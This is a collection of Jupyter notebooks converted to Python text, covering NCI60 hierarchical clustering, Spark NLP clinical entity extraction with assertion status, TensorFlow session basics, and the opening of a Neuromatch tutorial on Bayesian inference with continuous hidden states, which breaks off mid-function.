labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6)
plt.title('Hierarchical CLustering on First Five Score Vectors', size=16);
# -
pd.crosstab(cut_tree(hc2, 4).ravel(), nci_labs)
|
labs_emredjan/labs/lab_10.5_NCI60_data_example.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: spark_nlp_2.4.4
# language: python
# name: spark_nlp_2.4.4
# ---
# +
import sparknlp_jsl # licensed version of Spark NLP
import sparknlp
spark = sparknlp_jsl.start("xxxx") # xxxx is a secret key. If you don't have it, please get in touch with JSL.
print("Spark NLP version: ", sparknlp.version())
print("Apache Spark version: ", spark.version)
# -
# Notebook from this article https://www.johnsnowlabs.com/explain-clinical-document-spark-nlp-pretrained-pipeline/
# Loading the pretrained clinical pipeline ("explain_clinical_doc_dl"). It has the following annotators inside.
#
# - Tokenizer
# - Sentence Detector
# - Clinical Word Embeddings (glove trained on pubmed dataset)
# - Clinical NER-DL (trained by SOTA algorithm on i2b2 dataset)
# - AssertionDL model (trained by SOTA algorithm on i2b2 dataset)
# +
from pyspark.ml import PipelineModel
pretrained_model = PipelineModel.load("clinical/models/explain_clinical_doc_dl")
# -
# ### with LightPipeline
# +
from sparknlp.base import LightPipeline
ner_lightModel = LightPipeline(pretrained_model)
# -
clinical_text = """
Patient with severe fever and sore throat.
He shows no stomach pain and he maintained on an epidural and PCA for pain control.
He also became short of breath with climbing a flight of stairs.
After CT, lung tumour located at the right lower lobe. Father with Alzheimer.
"""
result = ner_lightModel.annotate(clinical_text)
result.keys()
list(zip(result['token'],result['ner']))
result = ner_lightModel.annotate(clinical_text)
list(zip(result['ner_chunk'],result['assertion']))
# +
# %%time
result = ner_lightModel.fullAnnotate(clinical_text)
entity_tuples = [(n.result, n.metadata['entity'], m.result, n.begin, n.end) for n,m in zip(result[0]['ner_chunk'],result[0]['assertion'])]
# -
entity_tuples
# +
import pandas as pd
pd.DataFrame(entity_tuples, columns=["phrase","entity","assertion","start","end"])
# -
# ## with Spark dataframes
# +
data = spark.createDataFrame([
["Patient with severe feber and sore throat"],
["Patient shows no stomach pain"],
["She was maintained on an epidural and PCA for pain control."],
["He also became short of breath with climbing a flight of stairs."],
["Lung tumour located at the right lower lobe"],
["Father with Alzheimer."]
]).toDF("text")
data.show(truncate=False)
# -
pretrained_model.transform(data).show()
pretrained_model.transform(data).select("token.result","ner.result").show(truncate=False)
pretrained_model.transform(data).select("ner_chunk.result", "assertion.result").show(truncate=False)
|
tutorials/blogposts/2.clinical_entity_extraction_with_assertion.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ___
#
# <a href='http://www.pieriandata.com'> <img src='../Pierian_Data_Logo.png' /></a>
# ___
# # TensorFlow Basics
#
# Remember to reference the video for full explanations, this is just a notebook for code reference.
#
# You can import the library:
import tensorflow as tf
print(tf.__version__)
# ### Simple Constants
#
# Let's show how to create a simple constant with Tensorflow, which TF stores as a tensor object:
hello = tf.constant('Hello World')
type(hello)
x = tf.constant(100)
type(x)
# ### Running Sessions
#
# Now you can create a TensorFlow Session, which is a class for running TensorFlow operations.
#
# A `Session` object encapsulates the environment in which `Operation`
# objects are executed, and `Tensor` objects are evaluated. For example:
sess = tf.Session()
sess.run(hello)
type(sess.run(hello))
sess.run(x)
type(sess.run(x))
# ## Operations
#
# You can line up multiple Tensorflow operations in to be run during a session:
x = tf.constant(2)
y = tf.constant(3)
with tf.Session() as sess:
print('Operations with Constants')
print('Addition',sess.run(x+y))
print('Subtraction',sess.run(x-y))
print('Multiplication',sess.run(x*y))
print('Division',sess.run(x/y))
# ### Placeholder
#
# You may not always have the constants right away, and you may be waiting for a constant to appear after a cycle of operations. **tf.placeholder** is a tool for this. It inserts a placeholder for a tensor that will be always fed.
#
# **Important**: This tensor will produce an error if evaluated. Its value must be fed using the `feed_dict` optional argument to `Session.run()`,
# `Tensor.eval()`, or `Operation.run()`. For example, for a placeholder of a matrix of floating point numbers:
#
# x = tf.placeholder(tf.float32, shape=(1024, 1024))
#
# Here is an example for integer placeholders:
x = tf.placeholder(tf.int32)
y = tf.placeholder(tf.int32)
x
type(x)
# ### Defining Operations
add = tf.add(x,y)
sub = tf.subtract(x,y)
mul = tf.multiply(x,y)
# Running operations with variable input:
d = {x:20,y:30}
with tf.Session() as sess:
print('Operations with Constants')
print('Addition',sess.run(add,feed_dict=d))
print('Subtraction',sess.run(sub,feed_dict=d))
print('Multiplication',sess.run(mul,feed_dict=d))
# Now let's see an example of a more complex operation, using Matrix Multiplication. First we need to create the matrices:
import numpy as np
# Make sure to use floats here, int64 will cause an error.
a = np.array([[5.0,5.0]])
b = np.array([[2.0],[2.0]])
a
a.shape
b
b.shape
mat1 = tf.constant(a)
mat2 = tf.constant(b)
# The matrix multiplication operation:
matrix_multi = tf.matmul(mat1,mat2)
# Now run the session to perform the Operation:
with tf.Session() as sess:
result = sess.run(matrix_multi)
print(result)
# That is all for now! Next we will expand these basic concepts to construct out own Multi-Layer Perceptron model!
# # Great Job!
|
Udemy/Refactored_Py_DS_ML_Bootcamp-master/22-Deep Learning/01-Tensorflow Basics.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.7.10 64-bit (''nma'': conda)'
# name: python3710jvsc74a57bd03e19903e646247cead5404f55ff575624523d45cf244c3f93aaf5fa10367032a
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W3D1_BayesianDecisions/W3D1_Tutorial2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# -
# # Tutorial 2: Bayesian inference and decisions with continuous hidden state
# **Week 3, Day 1: Bayesian Decisions**
#
# **By Neuromatch Academy**
#
# __Content creators:__ <NAME>, <NAME>, <NAME>, <NAME>
#
# __Content reviewers:__
# # Tutorial Objectives
#
# This notebook introduces you to Gaussians and Bayes' rule for continuous distributions, allowing us to model simple put powerful combinations of prior information and new measurements. In this notebook you will work through the same ideas we explored in the binary state tutorial, but you will be introduced to a new problem: finding and guiding Astrocat! You will see this problem again in more complex ways in the following days.
#
# In this notebook, you will:
#
# 1. Learn about the Gaussian distribution and its nice properies
# 2. Explore how we can extend the ideas from the binary hidden tutorial to continuous distributions
# 3. Explore how different priors can produce more complex posteriors.
# 4. Explore Loss functions often used in inference and complex utility functions.
# ---
# ##Setup
# Please execute the cells below to initialize the notebook environment.
# imports
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import multivariate_normal
from scipy.stats import gamma as gamma_distribution
from matplotlib.transforms import Affine2D
# + cellView="form"
#@title Figure Settings
# %matplotlib inline
# %config InlineBackend.figure_format = 'retina'
import ipywidgets as widgets
from ipywidgets import FloatSlider
from ipywidgets import interact, fixed, HBox, Layout, VBox, interactive, Label
plt.style.use("https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/nma.mplstyle")
import warnings
warnings.filterwarnings("ignore")
# + cellView="form"
# @title Plotting functions
def plot_gaussian(μ, σ):
x = np.linspace(-7, 7, 1000, endpoint=True)
y = gaussian(x, μ, σ)
plt.figure(figsize=(6, 4))
plt.plot(x, y, c='blue')
plt.fill_between(x, y, color='b', alpha=0.2)
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.yticks([])
plt.show()
def plot_losses(μ, σ):
x = np.linspace(-2, 2, 400, endpoint=True)
y = gaussian(x, μ, σ)
error = x - μ
mse_loss = (error)**2
abs_loss = np.abs(error)
zero_one_loss = (np.abs(error) >= 0.02).astype(np.float)
fig, (ax_gaus, ax_error) = plt.subplots(2, 1, figsize=(6, 8))
ax_gaus.plot(x, y, color='blue', label='true distribution')
ax_gaus.fill_between(x, y, color='blue', alpha=0.2)
ax_gaus.set_ylabel('$\\mathcal{N}(x, \\mu, \\sigma^2)$')
ax_gaus.set_xlabel('x')
ax_gaus.set_yticks([])
ax_gaus.legend(loc='upper right')
ax_error.plot(x, mse_loss, color='c', label='Mean Squared Error', linewidth=3)
ax_error.plot(x, abs_loss, color='m', label='Absolute Error', linewidth=3)
ax_error.plot(x, zero_one_loss, color='y', label='Zero-One Loss', linewidth=3)
ax_error.legend(loc='upper right')
ax_error.set_xlabel('$\\hat{\\mu}$')
ax_error.set_ylabel('Error')
plt.show()
def plot_mvn2d(mu1, mu2, sigma1, sigma2, corr):
x, y = np.mgrid[-2:2:.02, -2:2:.02]
cov12 = corr * sigma1 * sigma2
z = mvn2d(x, y, mu1, mu2, sigma1, sigma2, cov12)
plt.figure(figsize=(6, 6))
plt.contourf(x, y, z, cmap='Reds')
plt.axis("off")
plt.show()
def plot_marginal(sigma1, sigma2, c_x, c_y, corr):
mu1, mu2 = 0.0, 0.0
cov12 = corr * sigma1 * sigma2
xx, yy = np.mgrid[-2:2:.02, -2:2:.02]
x, y = xx[:, 0], yy[0]
p_x = gaussian(x, mu1, sigma1)
p_y = gaussian(y, mu2, sigma2)
zz = mvn2d(xx, yy, mu1, mu2, sigma1, sigma2, cov12)
mu_x_y = mu1+cov12*(c_y-mu2)/sigma2**2
mu_y_x = mu2+cov12*(c_x-mu1)/sigma1**2
sigma_x_y = np.sqrt(sigma2**2 - cov12**2/sigma1**2)
sigma_y_x = np.sqrt(sigma1**2-cov12**2/sigma2**2)
p_x_y = gaussian(x, mu_x_y, sigma_x_y)
p_y_x = gaussian(x, mu_y_x, sigma_y_x)
p_c_y = gaussian(mu_x_y-sigma_x_y, mu_x_y, sigma_x_y)
p_c_x = gaussian(mu_y_x-sigma_y_x, mu_y_x, sigma_y_x)
# definitions for the axes
left, width = 0.1, 0.65
bottom, height = 0.1, 0.65
spacing = 0.01
rect_z = [left, bottom, width, height]
rect_x = [left, bottom + height + spacing, width, 0.2]
rect_y = [left + width + spacing, bottom, 0.2, height]
# start with a square Figure
fig = plt.figure(figsize=(8, 8))
ax_z = fig.add_axes(rect_z)
ax_x = fig.add_axes(rect_x, sharex=ax_z)
ax_y = fig.add_axes(rect_y, sharey=ax_z)
ax_z.set_axis_off()
ax_x.set_axis_off()
ax_y.set_axis_off()
ax_x.set_xlim(np.min(x), np.max(x))
ax_y.set_ylim(np.min(y), np.max(y))
ax_z.contourf(xx, yy, zz, cmap='Greys')
ax_z.hlines(c_y, mu_x_y-sigma_x_y, mu_x_y+sigma_x_y, color='c', zorder=9, linewidth=3)
ax_z.vlines(c_x, mu_y_x-sigma_y_x, mu_y_x+sigma_y_x, color='m', zorder=9, linewidth=3)
ax_x.plot(x, p_x, label='$p(x)$', c = 'b', linewidth=3)
ax_x.plot(x, p_x_y, label='$p(x|y = C_y)$', c = 'c', linestyle='dashed', linewidth=3)
ax_x.hlines(p_c_y, mu_x_y-sigma_x_y, mu_x_y+sigma_x_y, color='c', linestyle='dashed', linewidth=3)
ax_y.plot(p_y, y, label='$p(y)$', c = 'r', linewidth=3)
ax_y.plot(p_y_x, y, label='$p(y|x = C_x)$', c = 'm', linestyle='dashed', linewidth=3)
ax_y.vlines(p_c_x, mu_y_x-sigma_y_x, mu_y_x+sigma_y_x, color='m', linestyle='dashed', linewidth=3)
ax_x.legend(loc="upper left", frameon=False)
ax_y.legend(loc="lower right", frameon=False)
plt.show()
def plot_bayes(mu1, mu2, sigma1, sigma2):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
plt.figure(figsize=(8, 6))
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.show()
def plot_information(mu1, sigma1, mu2, sigma2):
x = np.linspace(-7, 7, 1000, endpoint=True)
mu3, sigma3 = product_guassian(mu1, mu2, sigma1, sigma2)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
posterior = gaussian(x, mu3, sigma3)
plt.figure(figsize=(8, 6))
plt.plot(x, prior, c='b', label='Satellite')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='Space Mouse')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='Center')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.show()
def plot_information_global(mu3, sigma3, mu1, mu2):
x = np.linspace(-7, 7, 1000, endpoint=True)
sigma1, sigma2 = reverse_product(mu3, sigma3, mu1, mu2)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
posterior = gaussian(x, mu3, sigma3)
plt.figure(figsize=(8, 6))
plt.plot(x, prior, c='b', label='Satellite')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='Space Mouse')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='Center')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.show()
def plot_loss_utility_gaussian(loss_f, mu, sigma, mu_true):
x = np.linspace(-7, 7, 1000, endpoint=True)
posterior = gaussian(x, mu, sigma)
plot_loss_utility(x, posterior, loss_f, mu_true)
def plot_loss_utility_mixture(loss_f, mu1, mu2, sigma1, sigma2, factor, mu_true):
x = np.linspace(-7, 7, 1000, endpoint=True)
y_1 = gaussian(x, mu1, sigma1)
y_2 = gaussian(x, mu2, sigma2)
posterior = y_1 * factor + y_2 * (1.0 - factor)
plot_loss_utility(x, posterior, loss_f, mu_true)
def plot_loss_utility(x, posterior, loss_f, mu_true):
mean, median, mode = calc_mean_mode_median(x, posterior)
loss = calc_loss_func(loss_f, mu_true, x)
utility = calc_expected_loss(loss_f, posterior, x)
min_expected_loss = x[np.argmin(utility)]
plt.figure(figsize=(12, 8))
plt.subplot(2, 2, 1)
plt.title("Probability")
plt.plot(x, posterior, c='b')
plt.fill_between(x, posterior, color='b', alpha=0.2)
plt.yticks([])
plt.xlabel('x')
plt.ylabel('$\pi \cdot p(x) + (1-\pi) \cdot p(y)$')
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.subplot(2, 2, 2)
plt.title(loss_f)
plt.plot(x, loss, c='c', label=loss_f)
# plt.fill_between(x, loss, color='c', alpha=0.2)
plt.ylabel('loss')
# plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(2, 2, 3)
plt.title("Expected Loss")
plt.plot(x, utility, c='y', label='$\mathbb{E}[L]$')
plt.axvline(min_expected_loss, ls='dashed', color='red', label='$Min~ \mathbb{E}[Loss]$')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.legend(loc="lower right")
plt.xlabel('x')
plt.ylabel('$\mathbb{E}[L]$')
plt.show()
def plot_loss_utility_bayes(mu1, mu2, sigma1, sigma2, mu_true, loss_f):
x = np.linspace(-4, 4, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
loss = calc_loss_func(loss_f, mu_true, x)
utility = - calc_expected_loss(loss_f, posterior, x)
plt.figure(figsize=(18, 5))
plt.subplot(1, 3, 1)
plt.title("Posterior distribution")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.subplot(1, 3, 2)
plt.title(loss_f)
plt.plot(x, loss, c='c')
# plt.fill_between(x, loss, color='c', alpha=0.2)
plt.ylabel('loss')
plt.subplot(1, 3, 3)
plt.title("Expected utility")
plt.plot(x, utility, c='y', label='utility')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.legend(loc="upper left")
plt.show()
def plot_simple_utility_gaussian(mu, sigma, mu_g, mu_c, sigma_g, sigma_c):
x = np.linspace(-7, 7, 1000, endpoint=True)
posterior = gaussian(x, mu, sigma)
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plt.figure(figsize=(18, 5))
plt.subplot(1, 3, 1)
plt.title("Probability")
plt.plot(x, posterior, c='b', label='posterior')
plt.fill_between(x, posterior, color='b', alpha=0.2)
plt.yticks([])
# plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(1, 3, 2)
plt.title("utility function")
plt.plot(x, gain, c='m', label='gain')
# plt.fill_between(x, gain, color='m', alpha=0.2)
plt.plot(x, -loss, c='c', label='loss')
# plt.fill_between(x, -loss, color='c', alpha=0.2)
plt.legend(loc="upper left")
plt.subplot(1, 3, 3)
plt.title("expected utility")
plt.plot(x, utility, c='y', label='utility')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.legend(loc="upper left")
plt.show()
def plot_utility_gaussian(mu1, mu2, sigma1, sigma2, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_utility_mixture(mu_m1, mu_m2, sigma_m1, sigma_m2, factor,
mu, sigma, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
y_1 = gaussian(x, mu_m1, sigma_m1)
y_2 = gaussian(x, mu_m2, sigma_m2)
prior = y_1 * factor + y_2 * (1.0 - factor)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_utility_uniform(mu, sigma, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = np.ones_like(x) / (x.max() - x.min())
likelihood = gaussian(x, mu, sigma)
posterior = likelihood
# posterior = np.multiply(prior, likelihood)
# posterior = posterior / (posterior.sum() * (x[1] - x[0]))
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_utility_gamma(alpha, beta, offset, mu, sigma, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gamma_pdf(x-offset, alpha, beta)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_bayes_row(x, prior, likelihood, posterior):
mean, median, mode = calc_mean_mode_median(x, posterior)
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.title("Prior and likelihood distribution")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
# plt.plot(x, posterior, c='k', label='posterior')
# plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.subplot(1, 2, 2)
plt.title("Posterior distribution")
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.1)
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.yticks([])
plt.xlabel('x')
plt.show()
def plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility):
mean, median, mode = calc_mean_mode_median(x, posterior)
max_utility = x[np.argmax(utility)]
plt.figure(figsize=(12, 8))
plt.subplot(2, 2, 1)
plt.title("Prior and likelihood distribution")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
# plt.plot(x, posterior, c='k', label='posterior')
# plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.subplot(2, 2, 2)
plt.title("Posterior distribution")
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.1)
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.yticks([])
plt.xlabel('x')
plt.subplot(2, 2, 3)
plt.title("utility function")
plt.plot(x, gain, c='m', label='gain')
# plt.fill_between(x, gain, color='m', alpha=0.2)
plt.plot(x, -loss, c='c', label='loss')
# plt.fill_between(x, -loss, color='c', alpha=0.2)
plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(2, 2, 4)
plt.title("expected utility")
plt.plot(x, utility, c='y', label='utility')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.axvline(max_utility, ls='dashed', color='red', label='Max utility')
plt.legend(loc="upper left")
plt.xlabel('x')
plt.ylabel('utility')
plt.legend(loc="lower right")
plt.show()
def gaussian_mixture(mu1, mu2, sigma1, sigma2, factor):
assert 0.0 < factor < 1.0
x = np.linspace(-7.0, 7.0, 1000, endpoint=True)
y_1 = gaussian(x, mu1, sigma1)
y_2 = gaussian(x, mu2, sigma2)
mixture = y_1 * factor + y_2 * (1.0 - factor)
plt.figure(figsize=(8, 6))
plt.plot(x, y_1, c='deepskyblue', label='p(x)', linewidth=3.0)
plt.fill_between(x, y_1, color='deepskyblue', alpha=0.2)
plt.plot(x, y_2, c='aquamarine', label='p(y)', linewidth=3.0)
plt.fill_between(x, y_2, color='aquamarine', alpha=0.2)
plt.plot(x, mixture, c='b', label='$\pi \cdot p(x) + (1-\pi) \cdot p(y)$', linewidth=3.0)
plt.fill_between(x, mixture, color='b', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.show()
def plot_bayes_loss_utility_gaussian(loss_f, mu_true, mu1, mu2, sigma1, sigma2):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility_uniform(loss_f, mu_true, mu, sigma):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = np.ones_like(x) / (x.max() - x.min())
likelihood = gaussian(x, mu, sigma)
posterior = likelihood
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility_gamma(loss_f, mu_true, alpha, beta, offset, mu, sigma):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gamma_pdf(x-offset, alpha, beta)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility_mixture(loss_f, mu_true, mu_m1, mu_m2, sigma_m1, sigma_m2, factor, mu, sigma):
x = np.linspace(-7, 7, 1000, endpoint=True)
y_1 = gaussian(x, mu_m1, sigma_m1)
y_2 = gaussian(x, mu_m2, sigma_m2)
prior = y_1 * factor + y_2 * (1.0 - factor)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f):
mean, median, mode = calc_mean_mode_median(x, posterior)
expected_loss = calc_expected_loss(loss_f, posterior, x)
min_expected_loss = x[np.argmin(expected_loss)]
plt.figure(figsize=(12, 8))
plt.subplot(2, 2, 1)
plt.title("Prior and Likelihood")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(2, 2, 2)
plt.title("Posterior")
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.1)
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.yticks([])
plt.xlabel('x')
plt.subplot(2, 2, 3)
plt.title(loss_f)
plt.plot(x, loss, c='c', label=loss_f)
# plt.fill_between(x, loss, color='c', alpha=0.2)
plt.ylabel('loss')
plt.xlabel('x')
plt.subplot(2, 2, 4)
plt.title("expected loss")
plt.plot(x, expected_loss, c='y', label='$\mathbb{E}[L]$')
# plt.fill_between(x, expected_loss, color='y', alpha=0.2)
plt.axvline(min_expected_loss, ls='dashed', color='red', label='$Min~ \mathbb{E}[Loss]$')
plt.legend(loc="lower right")
plt.xlabel('x')
plt.ylabel('$\mathbb{E}[L]$')
plt.show()
def loss_plot_switcher(what_to_plot):
if what_to_plot == "Gaussian":
widget = interact(plot_loss_utility_gaussian,
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_estimate", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_estimate", continuous_update=False),
mu_true = FloatSlider(min=-3.0, max=3.0, step=0.01, value=0.0, description="µ_true", continuous_update=False))
elif what_to_plot == "Mixture of Gaussians":
widget = interact(plot_loss_utility_mixture,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_est_1", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_est_2", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_est_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_est_2", continuous_update=False),
factor = FloatSlider(min=0.0, max=1.0, step=0.01, value=0.5, description="π", continuous_update=False),
mu_true = FloatSlider(min=-3.0, max=3.0, step=0.01, value=0.0, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
def plot_prior_switcher(what_to_plot):
if what_to_plot == "Gaussian":
widget = interact(plot_utility_gaussian,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
